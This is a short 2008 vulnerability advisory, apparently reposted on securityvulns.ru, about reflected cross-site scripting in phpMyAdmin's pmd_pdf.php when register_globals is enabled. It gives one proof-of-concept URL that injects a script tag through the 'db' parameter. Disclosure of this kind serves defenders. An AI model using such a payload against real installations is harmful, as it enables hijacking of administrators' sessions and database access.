Computer Security

Security Advisory: XSS in phpMyadmin
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  phpcrs <= 2.06 / Local File Inclusion Vulnerability (this is the correct :)

  vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability

  SiteEngine 5.x Multiple Remote Vulnerabilities

  iPei cross site scripting Vulnerablity

From:hadikiamarsi_(at)_hotmail.com <hadikiamarsi_(at)_hotmail.com>
Date:28.10.2008
Subject:XSS in phpMyadmin

Author : Hadi Kiamarsi

-------------------------------------------

Discovered by : Hadi Kiamarsi

-------------------------------------------

Exploited By : Hadi Kiamarsi

-------------------------------------------

E-Mail : hadikiamarsi[at]hotmail.com

-------------------------------------------

web site : www.ircrash.com

-------------------------------------------

members team : Hadi Kiamarsi - khashayar fereidani - sina yazdanmehr

-------------------------------------------

Sript Name : phpmyadmin ( All version )

Download Script : http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-3.0.0-all-languages.zip?
download

-------------------------------------------

XSS

Exploit :

register_globals=on

query : http://[www.example.com]/pmd_pdf.
php?db=>"><script>alert('Hadi-
Kiamarsi')</script>
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server